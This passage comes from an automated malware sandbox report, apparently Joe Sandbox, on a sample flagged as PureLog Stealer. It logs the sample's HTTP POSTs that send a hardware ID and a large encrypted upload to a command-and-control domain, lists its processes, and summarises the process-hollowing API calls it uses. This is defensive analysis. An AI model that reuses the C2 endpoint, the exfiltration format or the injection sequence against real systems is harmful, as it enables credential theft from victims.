2025-01-14 15:15:15 UTC	5201	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: un 4F([:7s~X`nO`i
2025-01-14 15:15:15 UTC	1135	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 15:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=614ib24qrc24vngcseu0jssqlk; expires=Sat, 10 May 2025 09:01:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tW3CVQwFPaDrzbkjVo4NHVy1oQwFLcEQNmewDC0zNvhFzdpF8g0CbGn%2F8qrDo0KgW0rhDdNImS2icGbxIdKADZA0dj0YOd01GdIuFNSikF19jl3cbmkyGmMqDcF6gPVwN%2FAep2daTg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901e9494bf5243cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1638&rtt_var=635&sent=19&recv=26&lost=0&retrans=0&sent_bytes=2853&recv_bytes=21491&delivery_rate=1696687&cwnd=198&unsent_bytes=0&cid=b87c7219dbb12583&ts=544&x=0"
2025-01-14 15:15:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 15:15:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	172.67.150.129	443	940	C:\Users\user\Desktop\mWAik6b.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 15:15:16 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PVRY6W5H1M5QJ1ASY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1404 Host: cultureddirtys.click
2025-01-14 15:15:16 UTC	1404	OUT	Data Raw: 2d 2d 50 56 52 59 36 57 35 48 31 4d 35 51 4a 31 41 53 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 50 56 52 59 36 57 35 48 31 4d 35 51 4a 31 41 53 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 56 52 59 36 57 35 48 31 4d 35 51 4a 31 41 53 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 Data Ascii: --PVRY6W5H1M5QJ1ASYContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--PVRY6W5H1M5QJ1ASYContent-Disposition: form-data; name="pid"1--PVRY6W5H1M5QJ1ASYContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmd
2025-01-14 15:15:19 UTC	1135	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 15:15:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u536lt1vjekigivh1mtn9uv19t; expires=Sat, 10 May 2025 09:01:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXwXZA2plmkjgNiGP%2F9LMl6WrL4iSSe7CsyBR6oaT81Yff0kvFQI65mcAA39MZPetnc9ZcylXxXn1gPzkv8aReN%2BSregzEXaSi68xn23owIgthOVCPxfKkLZ5HrIWS0GS4DsQFHQZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901e949bc9440f79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1531&rtt_var=580&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=2324&delivery_rate=1876606&cwnd=244&unsent_bytes=0&cid=3fc1d23d9518eb35&ts=3523&x=0"
2025-01-14 15:15:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 15:15:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49719	172.67.150.129	443	940	C:\Users\user\Desktop\mWAik6b.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 15:15:20 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=O7RCR1HE9Y0FP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572527 Host: cultureddirtys.click
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: 2d 2d 4f 37 52 43 52 31 48 45 39 59 30 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 4f 37 52 43 52 31 48 45 39 59 30 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 37 52 43 52 31 48 45 39 59 30 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 0d 0a 2d 2d 4f 37 52 43 Data Ascii: --O7RCR1HE9Y0FPContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--O7RCR1HE9Y0FPContent-Disposition: form-data; name="pid"1--O7RCR1HE9Y0FPContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmdpvku--O7RC
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: 90 62 b8 b9 1c 83 23 1d 34 af a1 a3 f5 ec 40 f4 01 8e a7 3b 63 66 23 49 1f 2d 7d 3f 82 21 5b a0 c9 7c b7 89 16 ac df 95 fb ed 67 a7 3d fb b3 87 4c 74 68 b2 0e ad 1a d2 2e 42 e2 1c 04 b6 78 7a f3 5e f9 17 3f 18 65 b0 93 ba d8 6c b0 90 50 2b b7 a9 30 63 18 b9 78 df 74 7c c3 41 88 4a 66 e4 20 4a 6b 4d 73 e6 e5 2a 08 38 40 d3 46 87 10 c0 74 3f 7a 69 27 88 12 aa 92 ba 79 dd b0 04 45 6d 4e 88 7d a2 fe 64 b7 25 a2 2b 34 ac 98 b0 f8 3a 4d 93 27 19 b5 5b 2e 90 7e 86 81 21 7b e6 3f 7e 62 75 52 cf 6d 15 72 ef b2 6a c8 8e 69 40 e8 0c 8a 9d 37 8e 04 46 4b 37 1a d5 da 6e 32 2d a6 5a 76 f4 ac 5e 6f aa e7 d5 c7 85 65 40 96 3c 64 d9 98 38 78 06 75 fc 76 6b 30 d7 1e 03 d3 a1 89 55 6e 65 c6 1e 5a 56 73 a4 3e 1f e9 35 48 0b 3b 80 10 dd c4 d9 bf cd a8 06 84 00 1c 8d 0e 5d f1 Data Ascii: b#4@;cf#I-}?![\|g=Lth.Bxz^?elP+0cxt\|AJf JkMs*8@Ft?zi'yEmN}d%+4:M'[.~!{?~buRmrji@7FK7n2-Zv^oe@<d8xuvk0UneZVs>5H;]
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: 99 9c 51 be 1e 63 64 d6 1e 74 53 7d 58 f2 0a 57 d3 47 85 a6 86 5b 2a c7 c7 31 52 a8 a9 67 9d f9 84 44 7b 3e 2c 08 c9 8d 85 60 e3 08 9b 9b b5 78 39 49 9e 9e bd a4 41 1b 3b 5b 9d de 54 e4 5b 77 bc d0 25 99 0a 05 42 2e f1 77 74 56 1c 27 4c 30 73 8a ec 27 25 be de 07 c8 71 61 f4 5d a1 0d cd 89 97 6a f5 b7 37 bf bf ee 53 67 35 08 a4 87 73 b3 e8 5f 37 5c 1e 84 93 50 fd 8f a2 fc f9 dc 5e 6d ef ee 38 fd 0c e3 18 df 97 a6 04 66 e2 d3 4a 4e dd 96 e1 a6 3e 19 a1 d7 8c 54 b7 5f 0c 1f 28 1e 7a f5 66 78 c6 e7 ed 4f 31 d6 4b 17 ee 93 30 da 84 ca 9b e0 e9 95 07 10 f3 53 10 e7 cb 45 ed 71 83 20 4e 79 d2 e0 a1 fc 0c 61 c6 88 55 47 55 57 c4 e2 5e ab b8 e2 55 eb 99 5b 56 77 aa 39 e3 55 c1 f5 42 7d c7 da 2b 78 5b 4f 1a 88 8c 94 4d d6 2a 0f d6 74 5e fc 23 36 4a 3d 63 cf 53 46 Data Ascii: QcdtS}XWG[1RgD{>,`x9IA;[T[w%B.wtV'L0s'%qa]j7Sg5s_7\P^m8fJN>T_(zfxO1K0SEq NyaUGUW^U[Vw9UB}+x[OMt^#6J=cSF
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: c1 b3 5a cd 1f ba 2c 6e af 6f 86 a3 c4 3f 22 0d 92 27 b5 8a c4 a9 40 9c 65 2f 2e f6 9c 7c 51 17 77 92 58 db 5c 55 59 60 cd 36 88 58 28 f9 ed b2 47 ee bc 82 e0 a0 f6 56 e0 ef b6 33 d0 19 d7 a3 9e e3 a0 f3 f6 98 c2 15 f8 67 b5 cb 54 04 4b c9 b1 b4 e3 74 f2 a4 e1 83 9b c0 43 46 fe 69 ab ee 4a c3 8f ee af 33 03 95 4d f6 e8 69 b6 6f e8 26 b3 a4 43 72 66 ca ec d8 0f fa 1e 96 0e 55 73 63 33 d1 a8 42 7d 3c 2b ca 75 b5 a4 70 23 7a 3d 47 6b 52 fa 72 cd 2f 72 da 9d d6 d5 f4 09 f6 8e b9 db 55 d3 bc ff f6 b6 bd 1d 12 13 72 3b 1e 71 56 7e a9 0e b9 8c bd c9 6a 73 6b 1a bc 22 58 79 43 95 c2 f6 17 5f 6d 19 08 71 5d d1 bb e2 b0 48 d7 a5 55 8e c8 23 c1 47 93 ad e2 ae aa 07 f3 0b e9 ac be a6 88 3a 97 39 73 c5 73 a5 ad d2 d7 4f d7 dd 9c 3b ba 52 ab 6b 24 91 f2 72 e9 21 6d 35 Data Ascii: Z,no?"'@e/.\|QwX\UY`6X(GV3gTKtCFiJ3Mio&CrfUsc3B}<+up#z=GkRr/rUr;qV~jsk"XyC_mq]HU#G:9ssO;Rk$r!m5
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: 1e 37 1b c6 f7 47 14 e1 22 41 82 00 d1 03 ea e2 6c ea 01 38 99 50 6e 30 89 ba 32 89 71 ae d6 56 c3 05 c5 b2 11 7f 33 b1 91 73 fa e5 a0 2c 4f c8 29 0a 56 04 d9 42 24 99 c5 3f 36 a1 2a 2b f9 07 ed d1 61 99 36 e4 4b 58 e1 97 4a d9 0f 0d 8c 23 ca 4c b2 25 11 a1 9c e7 24 a8 1d e6 ac 80 8d c2 b3 8e 3a cb 79 aa bb 55 54 ab 55 da 1b 1f 74 df 1d 87 2e 11 b3 a7 d7 b9 cc f4 0c 85 2e f3 ae e7 c8 e4 f3 61 0f 19 e6 b8 6d 32 b4 4a a5 5c e9 bb 06 5e 7f 34 77 01 97 e3 e7 5d 27 31 df 5e c0 d2 0a b9 db 2b 4d 07 19 1c 38 75 6b dc a9 82 0b 09 3e dd 7a dd c8 03 06 87 1c 87 ad 0f ba 60 84 37 df 4f f9 ef bc a1 69 1a a0 2e ed 78 07 2f 5d 11 42 ee ac 54 0d 0b fb 2b a6 fc 88 9a 61 e6 35 3c 81 a4 bc 3f 00 bd 07 ff ff 3b b6 57 3b 47 f9 5b 71 fe 85 93 7b 8a 23 ee 94 26 1a c3 cb e3 ac Data Ascii: 7G"Al8Pn02qV3s,O)VB$?6*+a6KXJ#L%$:yUTUt..am2J\^4w]'1^+M8uk>z`7Oi.x/]BT+a5<?;W;G[q{#&
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: fc a4 61 81 9d f7 da 33 d5 f4 c8 65 e2 50 ce fd e5 7b 38 60 c5 6c ab 16 aa 38 e0 f4 d9 34 bc 55 bd 44 4b e0 db 5d 9a c9 7c 5a a9 87 16 31 70 11 2b 92 e2 35 23 4d b3 b3 50 52 84 fd a0 f1 53 12 b1 85 ff a6 69 d5 3b 8b c6 d5 38 0b 8f c8 10 c6 0d f0 e2 08 f5 a9 16 0d bc ba d7 7d 7a 4a fe c8 6a d3 e3 dd 19 2d e6 8d f1 2a 5a d0 7f be c4 93 61 2a 04 2a 10 8e 70 af bb 9f f5 c6 ba 4a ca b9 0c 26 95 68 77 a0 be 34 eb e4 d7 fb 09 8f 1b 9f ae 95 53 16 fd ba e8 c0 f4 ce 4a 80 af 72 f4 e7 c4 76 9d f3 eb d9 4c 91 58 3a 8f c9 10 a5 86 fd e5 c5 ac 30 6d 93 4e 80 35 9b 64 74 c1 fb f9 61 be 06 65 95 48 22 d1 73 c5 38 93 00 fe 8c 04 84 03 74 97 bb 6a ab 2e 74 45 34 73 b1 cf 15 8e 54 3e 82 74 cb 1c 8e 65 b9 32 60 ef 06 cc fd 02 33 10 cb e0 91 aa 8e bb d1 13 50 72 5c f1 30 2d Data Ascii: a3eP{8`l84UDK]\|Z1p+5#MPRSi;8}zJj-Za*pJ&hw4SJrvLX:0mN5dtaeH"s8tj.tE4sT>te2`3Pr\0-
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: 97 23 16 3c fa 5d 2a df 38 5f 45 3b 12 51 1b 10 ac 48 65 1e 13 80 9d 31 df 67 43 9e a2 a8 f5 0c 0b c0 bc c2 3a 7a 18 59 8b 7f 83 1e 0e e2 73 0b c4 41 25 92 f2 fd 99 37 78 c3 cd dd 5a 1a 48 59 50 ef c2 55 41 f7 cc b3 32 b1 18 35 89 83 b1 36 c2 60 2d 13 34 74 55 e0 97 42 da 51 33 03 31 28 9e ab 86 ee d9 be d8 13 09 f4 bc e4 12 63 be a6 f0 97 1b 20 29 9f 99 10 1a 41 d6 dd 4f 68 db ea cd ba 0c b4 75 ae 06 b8 36 ef 1d 3d be f0 65 86 32 3d f9 59 63 45 fd e1 6c d2 a2 31 25 7d 18 cd f1 cd 54 9c cf 79 08 ea fb 7e 69 49 2b 7b 73 7b df d2 a5 c0 05 35 43 09 95 93 48 31 ee f9 d1 0f ca f5 00 89 7d a9 eb 7e 5a 38 5e e6 b2 c0 6b d0 58 57 2f c3 ae c3 fa 10 a8 ec 94 70 76 a6 8c fe be ed 45 7a a8 e8 83 9c db 2b 3b 69 21 fc dd cd 65 5f 6b ab 76 c9 74 ac 78 c4 e0 22 2f b6 78 Data Ascii: #<]*8_E;QHe1gC:zYsA%7xZHYPUA256`-4tUBQ31(c )AOhu6=e2=YcEl1%}Ty~iI+{s{5CH1}~Z8^kXW/pvEz+;i!e_kvtx"/x
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: db b0 7a fa 9e e7 d7 78 3c 19 87 b5 2e a4 70 5f 94 0e cf 80 a8 9c cd 73 01 82 74 20 9a d7 03 a3 be b7 3f 07 68 e6 9c dd e4 4c f9 b8 ec 24 29 7a 05 58 3f 60 e0 40 7c 9b 18 bd 9b 0f 1c f9 4f 73 fb e2 69 b9 79 bb b0 f9 d1 ba 78 30 db 62 a0 64 44 52 5c 2f f2 32 78 1c 5e c2 d1 a9 d9 07 89 16 b1 bb 3b ae 5a 48 42 2b a7 70 92 2a 15 b6 96 0e b7 d9 aa 0b 82 6d b8 2e de e1 d9 d9 d5 e6 51 6d 11 fa 17 f1 10 42 c7 1c e1 12 98 d2 50 b8 30 76 ef 09 7f 8e c5 79 e7 ba 34 01 d3 ec e7 da 28 6f f3 6e a2 d3 5e e3 ca 20 09 a8 b1 a2 15 c9 9b 58 1f ba c0 3b aa ef 87 79 e3 c2 95 bb aa 82 66 ac 69 b7 ee fe 4c 2d f2 66 3f ba 56 8b 16 bb 8c d9 3b 18 49 c3 1c 9b f8 a6 15 fe bf d6 45 2b 9d bf b2 dd df 8a 53 ef 26 e1 49 69 fb f0 13 aa 4b ad 17 e3 54 e9 b2 66 a7 b0 d0 25 40 38 4a 02 a4 Data Ascii: zx<.p_st ?hL$)zX?`@\|Osiyx0bdDR\/2x^;ZHB+p*m.QmBP0vy4(on^ X;yfiL-f?V;IE+S&IiKTf%@8J
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: 14 d1 fa 04 ef a5 f2 c6 10 43 91 67 99 83 e5 5c 0a 58 ac d8 fe 5a ca e6 3b ee ee 75 9e ee 32 23 12 92 6b 8f b3 21 38 80 8c c5 01 26 3d 1c fd 56 c3 f1 be af 84 93 0a 20 d6 8d 61 a5 6b 35 9e 44 22 44 0f 94 23 1f 02 39 cb c3 97 51 62 ed fc 1d 8e 0a 30 89 9f 09 58 44 3f 96 22 e8 34 55 21 c9 24 52 76 af 6a 90 73 51 51 4b 49 1f 40 b2 17 29 d6 9b 7c 06 be e4 65 20 c9 57 c6 c0 32 b0 40 1c 9d 38 2b cc 47 b3 e4 2c 2f e0 4a 2e 23 0e 21 8b 02 a7 42 2f a0 60 eb a6 d0 7a 03 dc d2 6d 7a 3b e3 27 68 6f d0 3a 13 ce bd 4b 49 52 32 34 14 80 64 4f 58 d0 0c 0b 14 f7 0e 11 ae 2c e2 08 85 b1 5b 82 4c 01 2e c4 ca 31 99 34 25 04 84 2d 51 db c5 b2 ac b9 10 18 22 49 76 80 4a 81 04 45 46 07 ce c0 dc d0 bc 2e 49 9b 5d b2 9e d2 de a6 8d 19 db 4e f1 a9 5b 76 3d 0d 4c 33 45 27 b7 eb f4 Data Ascii: Cg\XZ;u2#k!8&=V ak5D"D#9Qb0XD?"4U!$RvjsQQKI@)\|e W2@8+G,/J.#!B/`zmz;'ho:KIR24dOX,[L.14%-Q"IvJEF.I]N[v=L3E'
2025-01-14 15:15:20 UTC	15331	OUT	Data Raw: 3a 30 95 12 e8 41 3e 6b 62 2b 3b 51 11 70 bb 61 1a aa f3 28 6d 49 a4 84 d1 d8 f9 ab 01 31 fb 71 1e d0 ed 62 50 f4 9a 75 dc ca d8 bf ed e6 bd b7 55 84 38 e4 8b 7d 2f 97 c7 9f fe b7 55 e9 3c 2a 4c 26 ef 51 58 9e 0d 1c c2 60 f3 bb ad f7 9f 91 be b8 12 e4 fa fb e3 ab 68 83 82 c5 84 d4 92 21 9a 4f a6 c3 a9 f8 d1 d0 95 27 eb 7d 77 68 fa cc d4 f9 fc c8 87 69 01 2c 5f fe 58 6f 08 3f c1 1b df 78 73 06 af f4 dd 94 98 42 6f 92 be c1 92 3e 60 17 34 23 11 e0 b0 f2 a6 c2 57 89 37 8a 5d 68 5a 4d 8a ce b4 ce 38 5c 00 d8 7f b3 6f ea b0 26 3b 8a fd 9c b9 6f 82 bc ff 6a 0d 21 b8 81 54 68 04 90 12 10 5e c1 87 5c 99 75 41 20 b9 04 40 ff da 3f de 1b ac 2c ca da 87 dc fb 06 8b b0 49 27 ff fe eb 6b 34 7e c2 8a 42 8e 44 de 66 d0 69 5f e3 17 2c 46 f9 b4 81 00 9e 67 57 74 dc 40 72 Data Ascii: :0A>kb+;Qpa(mI1qbPuU8}/U<*L&QX`h!O'}whi,_Xo?xsBo>`4#W7]hZM8\o&;oj!Th^\uA @?,I'k4~BDfi_,FgWt@r
2025-01-14 15:15:29 UTC	1151	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 15:15:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hfp2gi7cc5r47hqinruugi88sg; expires=Sat, 10 May 2025 09:02:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLk4R7ao9UvaYY2ZkiSWBFofSPGANoppm8nqAsMOSVueYyBnf%2BC2C%2BwNWLbE23kyA%2FnB5jbr%2B4HDH0qxtc59ZLL7l%2B%2Fz7l8XQdUx%2FTImjyOmlpJ9OBshcMZBruosJPLi25w8WL%2F7rw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901e94b6f8d3de98-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1554&rtt_var=589&sent=205&recv=586&lost=0&retrans=0&sent_bytes=2852&recv_bytes=575073&delivery_rate=1846932&cwnd=212&unsent_bytes=0&cid=ca5232a62a8b3249&ts=8626&x=0"

Target ID:	0
Start time:	10:15:08
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\mWAik6b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mWAik6b.exe"
Imagebase:	0x30000
File size:	456'304 bytes
MD5 hash:	16A53E18CA53FE602974F0A4B7FFBF3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:15:08
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\mWAik6b.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\mWAik6b.exe"
Imagebase:	0x250000
File size:	456'304 bytes
MD5 hash:	16A53E18CA53FE602974F0A4B7FFBF3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:15:08
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\mWAik6b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mWAik6b.exe"
Imagebase:	0xc80000
File size:	456'304 bytes
MD5 hash:	16A53E18CA53FE602974F0A4B7FFBF3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:15:09
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 928
Imagebase:	0x200000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	22.5%
Total number of Nodes:	40
Total number of Limit Nodes:	3

Executed Functions

Function 024A7F65 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024A7ED7,024A7EC7), ref: 024A80FD
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024A8110
Wow64GetThreadContext.KERNEL32(00000390,00000000), ref: 024A812E
ReadProcessMemory.KERNELBASE(00000384,?,024A7F1B,00000004,00000000), ref: 024A8152
VirtualAllocEx.KERNELBASE(00000384,?,?,00003000,00000040), ref: 024A817D
TerminateProcess.KERNELBASE(00000384,00000000), ref: 024A819C
WriteProcessMemory.KERNELBASE(00000384,00000000,?,?,00000000,?), ref: 024A81D5
WriteProcessMemory.KERNELBASE(00000384,00400000,?,?,00000000,?,00000028), ref: 024A8220
WriteProcessMemory.KERNELBASE(00000384,?,?,00000004,00000000), ref: 024A825E
Wow64SetThreadContext.KERNEL32(00000390,02480000), ref: 024A829A
ResumeThread.KERNELBASE(00000390), ref: 024A82A9

Strings

Load, xrefs: 024A7FA3
VirtualAlloc, xrefs: 024A802C
ResumeThread, xrefs: 024A80A1
aryA, xrefs: 024A7FAB
GetP, xrefs: 024A7FE7
TerminateProcess, xrefs: 024A818C
VirtualAllocEx, xrefs: 024A8065
SetThreadContext, xrefs: 024A808B
ress, xrefs: 024A7FEF
ReadProcessMemory, xrefs: 024A8052
CreateProcessW, xrefs: 024A8019
WriteProcessMemory, xrefs: 024A8078
GetThreadContext, xrefs: 024A803F

Memory Dump Source

Source File: 00000000.00000002.2237143554.00000000024A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a7000_mWAik6b.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: 48a81c47ba5c8f86bcdbbc6a1480c2fb3a4779b0be9f8f82bd397b2d7f146da1
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: 4FB1067660064AAFDB60CF68CC80BDAB7A5FF88714F158125EA0CAB341D774FA51CB94

Function 024A80E2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024A7ED7,024A7EC7), ref: 024A80FD
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024A8110
Wow64GetThreadContext.KERNEL32(00000390,00000000), ref: 024A812E
ReadProcessMemory.KERNELBASE(00000384,?,024A7F1B,00000004,00000000), ref: 024A8152
VirtualAllocEx.KERNELBASE(00000384,?,?,00003000,00000040), ref: 024A817D
TerminateProcess.KERNELBASE(00000384,00000000), ref: 024A819C
WriteProcessMemory.KERNELBASE(00000384,00000000,?,?,00000000,?), ref: 024A81D5
WriteProcessMemory.KERNELBASE(00000384,00400000,?,?,00000000,?,00000028), ref: 024A8220
